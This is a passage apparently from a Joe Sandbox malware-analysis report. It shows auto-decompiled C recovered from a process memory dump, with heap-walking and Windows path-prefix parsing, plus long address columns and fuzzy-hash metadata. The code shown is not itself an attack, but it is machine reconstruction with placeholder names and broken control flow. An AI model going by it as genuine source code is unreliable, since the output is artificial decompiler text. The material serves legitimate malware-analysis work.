													_t395 = (_t393 & 0x000000ff) - _t427;
													__eflags = _t395;
													if(_t395 == 0) {
														_t511 = _t511 +  *_t469;
														__eflags = _t511;
													} else {
														_t398 = _t395 - 1;
														__eflags = _t398;
														if(_t398 == 0) {
															 *(_t528 - 0x90) =  *(_t528 - 0x90) +  *_t469;
															 *(_t528 - 0xb0) =  *(_t528 - 0xb0) + 1;
														} else {
															__eflags = _t398 == 1;
															if(_t398 == 1) {
																 *(_t528 - 0xa8) =  *(_t469 - 8);
																_t402 =  *_t469 & 0x0000ffff;
																 *(_t528 - 0xac) = _t402;
																_t511 = _t511 + ((_t402 & 0x0000ffff) + 0x0000000f & 0xfffffff8);
															}
														}
													}
													__eflags = _t511 -  *(_t528 - 0xe4);
													if(_t511 <  *(_t528 - 0xe4)) {
														break;
													}
													_t397 =  *(_t528 - 0x88) + 1;
													 *(_t528 - 0x88) = _t397;
													_t469 = _t469 + 0x10;
													__eflags = _t397 -  *(_t528 + 0x1c);
													_t392 =  *(_t528 - 0xa2);
													if(_t397 <  *(_t528 + 0x1c)) {
														continue;
													}
													goto L45;
												}
												_t475 = 0x216;
												 *(_t528 - 0x74) = 0x216;
												goto L45;
											}
										} else {
											asm("lock dec dword [eax+ecx*8+0x4]");
											goto L16;
										}
									}
									_t491 = E05674CAB(_t306, _t528 - 0xa4);
									 *(_t528 - 0x74) = _t491;
									__eflags = _t491;
									if(_t491 != 0) {
										goto L91;
									} else {
										_t474 =  *((intOrPtr*)(_t528 - 0x94));
										goto L20;
									}
								}
								L16:
								 *(_t528 - 0x74) = 0x1069;
								L93:
								_t298 =  *(_t528 - 0xd0) + 1;
								 *(_t528 - 0xd0) = _t298;
								_t474 = _t474 + _t511;
								 *((intOrPtr*)(_t528 - 0x94)) = _t474;
								_t494 = 4;
								__eflags = _t298 - _t494;
								if(_t298 >= _t494) {
									goto L100;
								}
								_t494 =  *(_t528 - 0xcc);
								_t435 = _t298;
								continue;
							}
							__eflags = _t494[2] | _t494[3];
							if((_t494[2] | _t494[3]) == 0) {
								goto L15;
							}
							goto L12;
						}
						__eflags = _t301;
						if(_t301 != 0) {
							goto L92;
						}
						goto L10;
						L92:
						goto L93;
					}
				} else {
					_push(0x57);
					L101:
					return E055FD130(_t427, _t494, _t511);
				}
			}










































































                                                                        0x05675ba5
                                                                        0x05675baa
                                                                        0x05675baf
                                                                        0x05675bb4
                                                                        0x05675bb6
                                                                        0x05675bbc
                                                                        0x05675bbe
                                                                        0x05675bc4
                                                                        0x05675bcd
                                                                        0x05675bd3
                                                                        0x05675bd6
                                                                        0x05675bdc
                                                                        0x05675be0
                                                                        0x05675be3
                                                                        0x05675beb
                                                                        0x05675bf2
                                                                        0x05675bf8
                                                                        0x05675bfe
                                                                        0x05675c04
                                                                        0x05675c0e
                                                                        0x05675c18
                                                                        0x05675c1f
                                                                        0x05675c25
                                                                        0x05675c2a
                                                                        0x05675c2c
                                                                        0x05675c32
                                                                        0x05675c3a
                                                                        0x05675c3f
                                                                        0x05675c42
                                                                        0x05675c48
                                                                        0x05675c5b
                                                                        0x05675c5b
                                                                        0x05675c2c
                                                                        0x05675cb7
                                                                        0x05675cb9
                                                                        0x05675cbf
                                                                        0x05675cc2
                                                                        0x05675cca
                                                                        0x05675ccb
                                                                        0x05675ccb
                                                                        0x05675cd1
                                                                        0x05675cd7
                                                                        0x05675cda
                                                                        0x05675ce1
                                                                        0x05675ce4
                                                                        0x05675ce7
                                                                        0x05675ced
                                                                        0x05675cf3
                                                                        0x05675cf9
                                                                        0x05675cff
                                                                        0x05675d08
                                                                        0x05675d0a
                                                                        0x05675d0e
                                                                        0x05675d10
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x05675d16
                                                                        0x05675d1a
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x05675d20
                                                                        0x05675d22
                                                                        0x05675d25
                                                                        0x05675d2f
                                                                        0x05675d2f
                                                                        0x05675d33
                                                                        0x05675d3d
                                                                        0x05675d49
                                                                        0x05675d4b
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x05675d5a
                                                                        0x05675d5d
                                                                        0x05675d60
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x05675d66
                                                                        0x05675d69
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x05675d6f
                                                                        0x05675d6f
                                                                        0x05675d73
                                                                        0x05675d79
                                                                        0x05675d7f
                                                                        0x05675d86
                                                                        0x05675d95
                                                                        0x05675d98
                                                                        0x05675dba
                                                                        0x05675dcb
                                                                        0x05675dce
                                                                        0x05675dd3
                                                                        0x05675dd6
                                                                        0x05675dd8
                                                                        0x05675de6
                                                                        0x05675dec
                                                                        0x05675dee
                                                                        0x05675df1
                                                                        0x05675df3
                                                                        0x0567635a
                                                                        0x0567635a
                                                                        0x00000000
                                                                        0x0567635a
                                                                        0x05675dfe
                                                                        0x05675e02
                                                                        0x05675e05
                                                                        0x05675e07
                                                                        0x05675e10
                                                                        0x05675e13
                                                                        0x05675e1b
                                                                        0x05675e1c
                                                                        0x05675e21
                                                                        0x05675e22
                                                                        0x05675e23
                                                                        0x05675e25
                                                                        0x05675e2a
                                                                        0x05675e2c
                                                                        0x05675e2e
                                                                        0x05675e36
                                                                        0x05675e39
                                                                        0x05675e42
                                                                        0x05675e47
                                                                        0x05675e4d
                                                                        0x05675e54
                                                                        0x05675e54
                                                                        0x05675e54
                                                                        0x05675e2e
                                                                        0x05675e5c
                                                                        0x05675e5f
                                                                        0x05675e62
                                                                        0x05675e64
                                                                        0x05675e6b
                                                                        0x05675e70
                                                                        0x05675e7a
                                                                        0x05675e7a
                                                                        0x05675e7a
                                                                        0x05675e6b
                                                                        0x05675e7e
                                                                        0x05675e7f
                                                                        0x05675e7f
                                                                        0x05675e81
                                                                        0x05675e87
                                                                        0x05675e8b
                                                                        0x05675e8c
                                                                        0x05675e8c
                                                                        0x05675e8c
                                                                        0x05675e9a
                                                                        0x05675e9c
                                                                        0x05675ea2
                                                                        0x05675ea6
                                                                        0x05675f50
                                                                        0x05675f50
                                                                        0x05675f57
                                                                        0x05675f66
                                                                        0x05675f66
                                                                        0x05675f66
                                                                        0x05675f68
                                                                        0x05675f6a
                                                                        0x056763d0
                                                                        0x00000000
                                                                        0x05675f70
                                                                        0x05675f70
                                                                        0x05675f91
                                                                        0x05675f9c
                                                                        0x05675f9e
                                                                        0x05675fa4
                                                                        0x05675fa6
                                                                        0x0567638c
                                                                        0x05676392
                                                                        0x056763a1
                                                                        0x056763a7
                                                                        0x056763af
                                                                        0x056763af
                                                                        0x056763bd
                                                                        0x056763d8
                                                                        0x00000000
                                                                        0x056763d8
                                                                        0x05675fac
                                                                        0x05675fb2
                                                                        0x05675fb4
                                                                        0x05675fbd
                                                                        0x05675fc6
                                                                        0x05675fce
                                                                        0x05675fd4
                                                                        0x05675fdc
                                                                        0x05675fec
                                                                        0x05675fed
                                                                        0x05675fee
                                                                        0x05675fef
                                                                        0x05675ff9
                                                                        0x05675ffa
                                                                        0x05675ffb
                                                                        0x05675ffc
                                                                        0x05676000
                                                                        0x05676004
                                                                        0x05676012
                                                                        0x05676012
                                                                        0x05676018
                                                                        0x05676019
                                                                        0x0567601a
                                                                        0x0567601b
                                                                        0x0567601c
                                                                        0x05676020
                                                                        0x05676059
                                                                        0x0567605c
                                                                        0x05676061
                                                                        0x05676061
                                                                        0x05676022
                                                                        0x05676022
                                                                        0x05676022
                                                                        0x05676025
                                                                        0x0567602a
                                                                        0x0567602b
                                                                        0x05676031
                                                                        0x05676037
                                                                        0x05676038
                                                                        0x0567603e
                                                                        0x05676048
                                                                        0x05676049
                                                                        0x0567604a
                                                                        0x0567604b
                                                                        0x0567604c
                                                                        0x0567604d
                                                                        0x05676053
                                                                        0x05676054
                                                                        0x05676054
                                                                        0x05676062
                                                                        0x05676065
                                                                        0x05676067
                                                                        0x0567606a
                                                                        0x05676070
                                                                        0x05676075
                                                                        0x05676076
                                                                        0x05676081
                                                                        0x05676087
                                                                        0x05676095
                                                                        0x05676099
                                                                        0x0567609e
                                                                        0x056760a4
                                                                        0x056760ae
                                                                        0x056760b0
                                                                        0x056760b3
                                                                        0x056760b6
                                                                        0x056760b8
                                                                        0x056760ba
                                                                        0x056760ba
                                                                        0x056760ba
                                                                        0x056760ba
                                                                        0x056760be
                                                                        0x056760c0
                                                                        0x056760c5
                                                                        0x056760c5
                                                                        0x056760c5
                                                                        0x056760c6
                                                                        0x056760cd
                                                                        0x05676114
                                                                        0x056760cf
                                                                        0x056760cf
                                                                        0x056760d4
                                                                        0x056760d5
                                                                        0x056760da
                                                                        0x056760db
                                                                        0x056760e1
                                                                        0x056760e2
                                                                        0x056760e8
                                                                        0x056760f8
                                                                        0x056760fd
                                                                        0x056760fe
                                                                        0x05676102
                                                                        0x05676104
                                                                        0x05676107
                                                                        0x05676109
                                                                        0x0567610b
                                                                        0x0567610b
                                                                        0x0567610b
                                                                        0x0567610b
                                                                        0x0567610f
                                                                        0x0567610f
                                                                        0x05676117
                                                                        0x0567611a
                                                                        0x0567611f
                                                                        0x05676125
                                                                        0x05676134
                                                                        0x05676139
                                                                        0x0567613f
                                                                        0x05676146
                                                                        0x05676148
                                                                        0x0567614b
                                                                        0x0567614d
                                                                        0x0567614f
                                                                        0x0567614f
                                                                        0x0567614f
                                                                        0x0567614f
                                                                        0x05676153
                                                                        0x05676159
                                                                        0x05676159
                                                                        0x0567615c
                                                                        0x05676163
                                                                        0x05676169
                                                                        0x0567616c
                                                                        0x05676172
                                                                        0x05676181
                                                                        0x05676186
                                                                        0x05676187
                                                                        0x0567618b
                                                                        0x05676191
                                                                        0x05676195
                                                                        0x056761a3
                                                                        0x056761bb
                                                                        0x056761c0
                                                                        0x056761c3
                                                                        0x056761cc
                                                                        0x056761d0
                                                                        0x056761dc
                                                                        0x056761de
                                                                        0x056761e1
                                                                        0x056761e4
                                                                        0x056761e6
                                                                        0x056761e8
                                                                        0x056761e8
                                                                        0x056761e8
                                                                        0x056761e8
                                                                        0x056761e6
                                                                        0x056761ec
                                                                        0x056761f3
                                                                        0x05676203
                                                                        0x05676209
                                                                        0x0567620a
                                                                        0x05676216
                                                                        0x0567621d
                                                                        0x05676227
                                                                        0x05676241
                                                                        0x05676246
                                                                        0x0567624c
                                                                        0x05676257
                                                                        0x05676259
                                                                        0x0567625c
                                                                        0x0567625e
                                                                        0x05676260
                                                                        0x05676260
                                                                        0x05676260
                                                                        0x05676260
                                                                        0x0567625e
                                                                        0x05676264
                                                                        0x05676267
                                                                        0x05676269
                                                                        0x05676315
                                                                        0x05676315
                                                                        0x0567631b
                                                                        0x0567631e
                                                                        0x05676324
                                                                        0x05676327
                                                                        0x0567632f
                                                                        0x05676330
                                                                        0x05676333
                                                                        0x0567633a
                                                                        0x0567633c
                                                                        0x05676335
                                                                        0x05676335
                                                                        0x05676335
                                                                        0x0567633f
                                                                        0x05676342
                                                                        0x0567634c
                                                                        0x05676352
                                                                        0x05676355
                                                                        0x05676355
                                                                        0x05676359
                                                                        0x00000000
                                                                        0x0567626f
                                                                        0x05676275
                                                                        0x05676275
                                                                        0x05676278
                                                                        0x0567627e
                                                                        0x0567627e
                                                                        0x05676281
                                                                        0x05676287
                                                                        0x0567628d
                                                                        0x05676298
                                                                        0x0567629c
                                                                        0x056762a2
                                                                        0x0567629e
                                                                        0x0567629e
                                                                        0x0567629e
                                                                        0x056762a7
                                                                        0x056762a7
                                                                        0x056762aa
                                                                        0x056762b0
                                                                        0x056762f0
                                                                        0x056762f0
                                                                        0x056762f2
                                                                        0x056762f8
                                                                        0x056762fd
                                                                        0x056762b2
                                                                        0x056762b2
                                                                        0x056762b2
                                                                        0x056762b5
                                                                        0x056762dd
                                                                        0x056762e2
                                                                        0x056762e5
                                                                        0x056762b7
                                                                        0x056762b8
                                                                        0x056762bb
                                                                        0x056762bd
                                                                        0x056762c0
                                                                        0x056762c4
                                                                        0x056762cd
                                                                        0x056762cd
                                                                        0x056762c0
                                                                        0x056762bb
                                                                        0x056762b5
                                                                        0x05676302
                                                                        0x05676303
                                                                        0x05676305
                                                                        0x05676305
                                                                        0x05676305
                                                                        0x0567630c
                                                                        0x0567630c
                                                                        0x00000000
                                                                        0x0567627e
                                                                        0x05676269
                                                                        0x05675eac
                                                                        0x05675ebb
                                                                        0x05675ebe
                                                                        0x05675ecb
                                                                        0x05675ecb
                                                                        0x05675ece
                                                                        0x05675ece
                                                                        0x05675ed4
                                                                        0x05675ed7
                                                                        0x05675ed9
                                                                        0x05675edb
                                                                        0x05675edb
                                                                        0x05675ee1
                                                                        0x05675ee1
                                                                        0x05675ee3
                                                                        0x05675f20
                                                                        0x05675f20
                                                                        0x05675ee5
                                                                        0x05675ee5
                                                                        0x05675ee5
                                                                        0x05675ee8
                                                                        0x05675f11
                                                                        0x05675f18
                                                                        0x05675eea
                                                                        0x05675eea
                                                                        0x05675eed
                                                                        0x05675ef2
                                                                        0x05675ef8
                                                                        0x05675efb
                                                                        0x05675f0a
                                                                        0x05675f0a
                                                                        0x05675eed
                                                                        0x05675ee8
                                                                        0x05675f22
                                                                        0x05675f28
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x05675f30
                                                                        0x05675f31
                                                                        0x05675f37
                                                                        0x05675f3a
                                                                        0x05675f3d
                                                                        0x05675f44
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x05675f46
                                                                        0x05675f48
                                                                        0x05675f4d
                                                                        0x00000000
                                                                        0x05675f4d
                                                                        0x05675dda
                                                                        0x05675ddf
                                                                        0x00000000
                                                                        0x05675ddf
                                                                        0x05675dd8
                                                                        0x05675da7
                                                                        0x05675da9
                                                                        0x05675dac
                                                                        0x05675dae
                                                                        0x00000000
                                                                        0x05675db4
                                                                        0x05675db4
                                                                        0x00000000
                                                                        0x05675db4
                                                                        0x05675dae
                                                                        0x05675d88
                                                                        0x05675d8d
                                                                        0x05676363
                                                                        0x05676369
                                                                        0x0567636a
                                                                        0x05676370
                                                                        0x05676372
                                                                        0x0567637a
                                                                        0x0567637b
                                                                        0x0567637d
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0567637f
                                                                        0x05676385
                                                                        0x00000000
                                                                        0x05676385
                                                                        0x05675d38
                                                                        0x05675d3b
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x05675d3b
                                                                        0x05675d27
                                                                        0x05675d29
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x05676360
                                                                        0x00000000
                                                                        0x05676360
                                                                        0x05675c10
                                                                        0x05675c10
                                                                        0x056763da
                                                                        0x056763e5
                                                                        0x056763e5

                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505918574.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5580000_cvtres.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 03bd31801820adefe51409482a4499d2113eb01ce2ebd74ba8d49840c17aeb64
                                                                        • Instruction ID: 298a3c8bc140115b3f0babf86a1f7dce66c10f9a3128b2c9d1e009ee0e459e47
                                                                        • Opcode Fuzzy Hash: 03bd31801820adefe51409482a4499d2113eb01ce2ebd74ba8d49840c17aeb64
                                                                        • Instruction Fuzzy Hash: 60425A71A14629CFDB24CF68C881BA9B7B1FF49314F1481EAD85DAB342E7349A85CF50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 055C4120 Relevance: .4, Instructions: 444COMMONCrypto
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 92%
                                                                        			E055C4120(signed char __ecx, signed short* __edx, signed short* _a4, signed int _a8, signed short* _a12, signed short* _a16, signed short _a20) {
				signed int _v8;
				void* _v20;
				signed int _v24;
				char _v532;
				char _v540;
				signed short _v544;
				signed int _v548;
				signed short* _v552;
				signed short _v556;
				signed short* _v560;
				signed short* _v564;
				signed short* _v568;
				void* _v570;
				signed short* _v572;
				signed short _v576;
				signed int _v580;
				char _v581;
				void* _v584;
				unsigned int _v588;
				signed short* _v592;
				void* _v597;
				void* _v600;
				void* _v604;
				void* _v609;
				void* _v616;
				void* __ebx;
				void* __edi;
				void* __esi;
				unsigned int _t161;
				signed int _t162;
				unsigned int _t163;
				void* _t169;
				signed short _t173;
				signed short _t177;
				signed short _t181;
				unsigned int _t182;
				signed int _t185;
				signed int _t213;
				signed int _t225;
				short _t233;
				signed char _t234;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				signed int _t250;
				void* _t251;
				signed short* _t254;
				void* _t255;
				signed int _t256;
				void* _t257;
				signed short* _t260;
				signed short _t265;
				signed short* _t269;
				signed short _t271;
				signed short** _t272;
				signed short* _t275;
				signed short _t282;
				signed short _t283;
				signed short _t290;
				signed short _t299;
				signed short _t307;
				signed int _t308;
				signed short _t311;
				signed short* _t315;
				signed short _t316;
				void* _t317;
				void* _t319;
				signed short* _t321;
				void* _t322;
				void* _t323;
				unsigned int _t324;
				signed int _t325;
				void* _t326;
				signed int _t327;
				signed int _t329;

				_t329 = (_t327 & 0xfffffff8) - 0x24c;
				_v8 =  *0x569d360 ^ _t329;
				_t157 = _a8;
				_t321 = _a4;
				_t315 = __edx;
				_v548 = __ecx;
				_t305 = _a20;
				_v560 = _a12;
				_t260 = _a16;
				_v564 = __edx;
				_v580 = _a8;
				_v572 = _t260;
				_v544 = _a20;
				if( *__edx <= 8) {
					L3:
					if(_t260 != 0) {
						 *_t260 = 0;
					}
					_t254 =  &_v532;
					_v588 = 0x208;
					if((_v548 & 0x00000001) != 0) {
						_v556 =  *_t315;
						_v552 = _t315[2];
						_t161 = E055DF232( &_v556);
						_t316 = _v556;
						_v540 = _t161;
						goto L17;
					} else {
						_t306 = 0x208;
						_t298 = _t315;
						_t316 = E055C6E30(_t315, 0x208, _t254, _t260,  &_v581,  &_v540);
						if(_t316 == 0) {
							L68:
							_t322 = 0xc0000033;
							goto L39;
						} else {
							while(_v581 == 0) {
								_t233 = _v588;
								if(_t316 > _t233) {
									_t234 = _v548;
									if((_t234 & 0x00000004) != 0 || (_t234 & 0x00000008) == 0 &&  *((char*)( *[fs:0x30] + 3)) < 0) {
										_t254 = L055C4620(_t298,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t316);
										if(_t254 == 0) {
											_t169 = 0xc0000017;
										} else {
											_t298 = _v564;
											_v588 = _t316;
											_t306 = _t316;
											_t316 = E055C6E30(_v564, _t316, _t254, _v572,  &_v581,  &_v540);
											if(_t316 != 0) {
												continue;
											} else {
												goto L68;
											}
										}
									} else {
										goto L90;
									}
								} else {
									_v556 = _t316;
									 *((short*)(_t329 + 0x32)) = _t233;
									_v552 = _t254;
									if(_t316 < 2) {
										L11:
										if(_t316 < 4 ||  *_t254 == 0 || _t254[1] != 0x3a) {
											_t161 = 5;
										} else {
											if(_t316 < 6) {
												L87:
												_t161 = 3;
											} else {
												_t242 = _t254[2] & 0x0000ffff;
												if(_t242 != 0x5c) {
													if(_t242 == 0x2f) {
														goto L16;
													} else {
														goto L87;
													}
													goto L101;
												} else {
													L16:
													_t161 = 2;
												}
											}
										}
									} else {
										_t243 =  *_t254 & 0x0000ffff;
										if(_t243 == 0x5c || _t243 == 0x2f) {
											if(_t316 < 4) {
												L81:
												_t161 = 4;
												goto L17;
											} else {
												_t244 = _t254[1] & 0x0000ffff;
												if(_t244 != 0x5c) {
													if(_t244 == 0x2f) {
														goto L60;
													} else {
														goto L81;
													}
												} else {
													L60:
													if(_t316 < 6) {
														L83:
														_t161 = 1;
														goto L17;
													} else {
														_t245 = _t254[2] & 0x0000ffff;
														if(_t245 != 0x2e) {
															if(_t245 == 0x3f) {
																goto L62;
															} else {
																goto L83;
															}
														} else {
															L62:
															if(_t316 < 8) {
																L85:
																_t161 = ((0 | _t316 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
																goto L17;
															} else {
																_t250 = _t254[3] & 0x0000ffff;
																if(_t250 != 0x5c) {
																	if(_t250 == 0x2f) {
																		goto L64;
																	} else {
																		goto L85;
																	}
																} else {
																	L64:
																	_t161 = 6;
																	goto L17;
																}
															}
														}
													}
												}
											}
											goto L101;
										} else {
											goto L11;
										}
									}
									L17:
									if(_t161 != 2) {
										_t162 = _t161 - 1;
										if(_t162 > 5) {
											goto L18;
										} else {
											switch( *((intOrPtr*)(_t162 * 4 +  &M055C45F8))) {
												case 0:
													_v568 = 0x5581078;
													__eax = 2;
													goto L20;
												case 1:
													goto L18;
												case 2:
													_t163 = 4;
													goto L19;
											}
										}
										goto L41;
									} else {
										L18:
										_t163 = 0;
										L19:
										_v568 = 0x55811c4;
									}
									L20:
									_v588 = _t163;
									_v564 = _t163 + _t163;
									_t306 =  *_v568 & 0x0000ffff;
									_t265 = _t306 - _v564 + 2 + (_t316 & 0x0000ffff);
									_v576 = _t265;
									if(_t265 > 0xfffe) {
										L90:
										_t322 = 0xc0000106;
									} else {
										if(_t321 != 0) {
											if(_t265 > (_t321[1] & 0x0000ffff)) {
												if(_v580 != 0) {
													goto L23;
												} else {
													_t322 = 0xc0000106;
													goto L39;
												}
											} else {
												_t177 = _t306;
												goto L25;
											}
											goto L101;
										} else {
											if(_v580 == _t321) {
												_t322 = 0xc000000d;
											} else {
												L23:
												_t173 = L055C4620(_t265,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t265);
												_t269 = _v592;
												_t269[2] = _t173;
												if(_t173 == 0) {
													_t322 = 0xc0000017;
												} else {
													_t316 = _v556;
													 *_t269 = 0;
													_t321 = _t269;
													_t269[1] = _v576;
													_t177 =  *_v568 & 0x0000ffff;
													L25:
													_v580 = _t177;
													if(_t177 == 0) {
														L29:
														_t307 =  *_t321 & 0x0000ffff;
													} else {
														_t290 =  *_t321 & 0x0000ffff;
														_v576 = _t290;
														_t310 = _t177 & 0x0000ffff;
														if((_t290 & 0x0000ffff) + (_t177 & 0x0000ffff) > (_t321[1] & 0x0000ffff)) {
															_t307 =  *_t321 & 0xffff;
														} else {
															_v576 = _t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2;
															E055EF720(_t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2, _v568[2], _t310);
															_t329 = _t329 + 0xc;
															_t311 = _v580;
															_t225 =  *_t321 + _t311 & 0x0000ffff;
															 *_t321 = _t225;
															if(_t225 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v576 + ((_t311 & 0x0000ffff) >> 1) * 2)) = 0;
															}
															goto L29;
														}
													}
													_t271 = _v556 - _v588 + _v588;
													_v580 = _t307;
													_v576 = _t271;
													if(_t271 != 0) {
														_t308 = _t271 & 0x0000ffff;
														_v588 = _t308;
														if(_t308 + (_t307 & 0x0000ffff) <= (_t321[1] & 0x0000ffff)) {
															_v580 = _t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2;
															E055EF720(_t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2, _v552 + _v564, _t308);
															_t329 = _t329 + 0xc;
															_t213 =  *_t321 + _v576 & 0x0000ffff;
															 *_t321 = _t213;
															if(_t213 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v580 + (_v588 >> 1) * 2)) = 0;
															}
														}
													}
													_t272 = _v560;
													if(_t272 != 0) {
														 *_t272 = _t321;
													}
													_t306 = 0;
													 *((short*)(_t321[2] + (( *_t321 & 0x0000ffff) >> 1) * 2)) = 0;
													_t275 = _v572;
													if(_t275 != 0) {
														_t306 =  *_t275;
														if(_t306 != 0) {
															 *_t275 = ( *_v568 & 0x0000ffff) - _v564 - _t254 + _t306 + _t321[2];
														}
													}
													_t181 = _v544;
													if(_t181 != 0) {
														 *_t181 = 0;
														 *((intOrPtr*)(_t181 + 4)) = 0;
														 *((intOrPtr*)(_t181 + 8)) = 0;
														 *((intOrPtr*)(_t181 + 0xc)) = 0;
														if(_v540 == 5) {
															_t182 = E055A52A5(1);
															_v588 = _t182;
															if(_t182 == 0) {
																E055BEB70(1, 0x56979a0);
																goto L38;
															} else {
																_v560 = _t182 + 0xc;
																_t185 = E055BAA20( &_v556, _t182 + 0xc,  &_v556, 1);
																if(_t185 == 0) {
																	_t324 = _v588;
																	goto L97;
																} else {
																	_t306 = _v544;
																	_t282 = ( *_v560 & 0x0000ffff) - _v564 + ( *_v568 & 0x0000ffff) + _t321[2];
																	 *(_t306 + 4) = _t282;
																	_v576 = _t282;
																	_t325 = _t316 -  *_v560 & 0x0000ffff;
																	 *_t306 = _t325;
																	if( *_t282 == 0x5c) {
																		_t149 = _t325 - 2; // -2
																		_t283 = _t149;
																		 *_t306 = _t283;
																		 *(_t306 + 4) = _v576 + 2;
																		_t185 = _t283 & 0x0000ffff;
																	}
																	_t324 = _v588;
																	 *(_t306 + 2) = _t185;
																	if((_v548 & 0x00000002) == 0) {
																		L97:
																		asm("lock xadd [esi], eax");
																		if((_t185 | 0xffffffff) == 0) {
																			_push( *((intOrPtr*)(_t324 + 4)));
																			E055E95D0();
																			L055C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t324);
																		}
																	} else {
																		 *(_t306 + 0xc) = _t324;
																		 *((intOrPtr*)(_t306 + 8)) =  *((intOrPtr*)(_t324 + 4));
																	}
																	goto L38;
																}
															}
															goto L41;
														}
													}
													L38:
													_t322 = 0;
												}
											}
										}
									}
									L39:
									if(_t254 !=  &_v532) {
										L055C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t254);
									}
									_t169 = _t322;
								}
								goto L41;
							}
							goto L68;
						}
					}
					L41:
					_pop(_t317);
					_pop(_t323);
					_pop(_t255);
					return E055EB640(_t169, _t255, _v8 ^ _t329, _t306, _t317, _t323);
				} else {
					_t299 = __edx[2];
					if( *_t299 == 0x5c) {
						_t256 =  *(_t299 + 2) & 0x0000ffff;
						if(_t256 != 0x5c) {
							if(_t256 != 0x3f) {
								goto L2;
							} else {
								goto L50;
							}
						} else {
							L50:
							if( *((short*)(_t299 + 4)) != 0x3f ||  *((short*)(_t299 + 6)) != 0x5c) {
								goto L2;
							} else {
								_t251 = E055E3D43(_t315, _t321, _t157, _v560, _v572, _t305);
								_pop(_t319);
								_pop(_t326);
								_pop(_t257);
								return E055EB640(_t251, _t257, _v24 ^ _t329, _t321, _t319, _t326);
							}
						}
					} else {
						L2:
						_t260 = _v572;
						goto L3;
					}
				}
				L101:
			}















































































                                                                        0x055c4128
                                                                        0x055c4135
                                                                        0x055c413c
                                                                        0x055c4141
                                                                        0x055c4145
                                                                        0x055c4147
                                                                        0x055c414e
                                                                        0x055c4151
                                                                        0x055c4159
                                                                        0x055c415c
                                                                        0x055c4160
                                                                        0x055c4164
                                                                        0x055c4168
                                                                        0x055c416c
                                                                        0x055c417f
                                                                        0x055c4181
                                                                        0x055c446a
                                                                        0x055c446a
                                                                        0x055c418c
                                                                        0x055c4195
                                                                        0x055c4199
                                                                        0x055c4432
                                                                        0x055c4439
                                                                        0x055c443d
                                                                        0x055c4442
                                                                        0x055c4447
                                                                        0x00000000
                                                                        0x055c419f
                                                                        0x055c41a3
                                                                        0x055c41b1
                                                                        0x055c41b9
                                                                        0x055c41bd
                                                                        0x055c45db
                                                                        0x055c45db
                                                                        0x00000000
                                                                        0x055c41c3
                                                                        0x055c41c3
                                                                        0x055c41ce
                                                                        0x055c41d4
                                                                        0x0560e138
                                                                        0x0560e13e
                                                                        0x0560e169
                                                                        0x0560e16d
                                                                        0x0560e19e
                                                                        0x0560e16f
                                                                        0x0560e16f
                                                                        0x0560e175
                                                                        0x0560e179
                                                                        0x0560e18f
                                                                        0x0560e193
                                                                        0x00000000
                                                                        0x0560e199
                                                                        0x00000000
                                                                        0x0560e199
                                                                        0x0560e193
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x055c41da
                                                                        0x055c41da
                                                                        0x055c41df
                                                                        0x055c41e4
                                                                        0x055c41ec
                                                                        0x055c4203
                                                                        0x055c4207
                                                                        0x0560e1fd
                                                                        0x055c4222
                                                                        0x055c4226
                                                                        0x0560e1f3
                                                                        0x0560e1f3
                                                                        0x055c422c
                                                                        0x055c422c
                                                                        0x055c4233
                                                                        0x0560e1ed
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x055c4239
                                                                        0x055c4239
                                                                        0x055c4239
                                                                        0x055c4239
                                                                        0x055c4233
                                                                        0x055c4226
                                                                        0x055c41ee
                                                                        0x055c41ee
                                                                        0x055c41f4
                                                                        0x055c4575
                                                                        0x0560e1b1
                                                                        0x0560e1b1
                                                                        0x00000000
                                                                        0x055c457b
                                                                        0x055c457b
                                                                        0x055c4582
                                                                        0x0560e1ab
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x055c4588
                                                                        0x055c4588
                                                                        0x055c458c
                                                                        0x0560e1c4
                                                                        0x0560e1c4
                                                                        0x00000000
                                                                        0x055c4592
                                                                        0x055c4592
                                                                        0x055c4599
                                                                        0x0560e1be
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x055c459f
                                                                        0x055c459f
                                                                        0x055c45a3
                                                                        0x0560e1d7
                                                                        0x0560e1e4
                                                                        0x00000000
                                                                        0x055c45a9
                                                                        0x055c45a9
                                                                        0x055c45b0
                                                                        0x0560e1d1
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x055c45b6
                                                                        0x055c45b6
                                                                        0x055c45b6
                                                                        0x00000000
                                                                        0x055c45b6
                                                                        0x055c45b0
